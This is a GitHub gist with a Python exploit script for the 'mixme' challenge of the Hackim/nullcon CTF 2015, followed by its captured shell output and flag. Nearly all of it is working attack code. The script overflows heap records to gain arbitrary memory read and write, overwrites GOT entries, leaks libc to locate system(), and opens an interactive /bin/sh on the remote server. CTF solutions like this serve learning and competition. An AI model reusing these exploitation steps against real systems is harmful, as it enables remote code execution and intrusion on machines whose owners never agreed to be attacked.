Skip to content

Instantly share code, notes, and snippets.

@g05u g05u/hackim_2015_mixme.py
Last active Aug 29, 2015

Embed
What would you like to do?
Hackim/nullcon CTF 2015 - mixme exploiting 400 points
#!/usr/bin/env python
from nulllife import *
import sys, time
# www.null-life.com
# write-up / exploit by @_g05u_
# Hackim/nullcon CTF 2015 - mixme exploiting 400 points
# Flag: aw3s0m3++_hipp1e_pwn_r0ckst4r
c = 0x61
s = NullSocket("54.163.248.69", 9005)
def store(name, size, data):
s.writeline("store")
s.readuntil("Name: ")
s.writeline(name)
s.readuntil("Size: ")
s.writeline(str(size))
s.readuntil("Enter data: ")
s.writeline(data)
def edit(name, size, data):
s.writeline("edit")
s.readuntil("Name: ")
s.writeline(name)
s.readuntil("Size: ")
s.writeline(str(size))
s.readuntil("new data: ")
s.write(data)
def get(name, size):
s.writeline("get")
s.readuntil("Name: ")
s.writeline(name)
s.readuntil("Size: ")
s.writeline(str(size))
return s.read(size)
def write_arbitrary(addr, size, data):
global c
store(chr(c), 1, chr(c ^ 0x20))
s.readuntil("exit): ")
c += 1
store(chr(c), 1, chr(c ^ 0x20))
c += 1
s.readuntil("exit): ")
edit(chr(c - 2), 40, "A" * 16 + "PWNT" + pack(0) * 3 + "DDDD" + pack(addr))
s.readuntil("exit): ")
return edit("PWNT", size, data)
def read_arbitrary(addr, size):
global c
store(chr(c), 1, chr(c ^ 0x20))
s.readuntil("exit): ")
c += 1
store(chr(c), 1, chr(c ^ 0x20))
c += 1
s.readuntil("exit): ")
edit(chr(c - 2), 40, "A" * 16 + "LEAK" + pack(0) * 3 + "DDDD" + pack(addr))
s.readuntil("exit): ")
return get("LEAK", size)
ret = 0x08048D3C
write_got = 0x0804B048
free_got = 0x0804B020
strncmp_got = 0x0804B058
#bruteforce offset from write to libc base
#using read_arbitrary and download libc
offset_write = 0xdb530
offset_system = 0x40100
s.readuntil("exit): ")
print 'Overwrite free_got'
write_arbitrary(free_got, 4, pack(ret))
print 'Read write got'
write_addr = struct.unpack("<I", read_arbitrary(write_got, 4))[0]
system_addr = write_addr - offset_write + offset_system
print 'System addr: 0x%08X' % system_addr
print 'Overwrite strncmp_got'
write_arbitrary(strncmp_got, 4, pack(system_addr))
s.readuntil("exit): ")
print 'Got shell...'
s.write("/bin/sh -i")
s.interactive()
'''
ls
bin
bin_old
busybox
etc
flag_fix_your_permissions.txt
l
lib
linuxrc
mixme
sbin
srv
usr
Invalid input
Select op (store/get/edit/exit): cat flag_fix_your_permissions.txt
aw3s0m3++_hipp1e_pwn_r0ckst4r
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.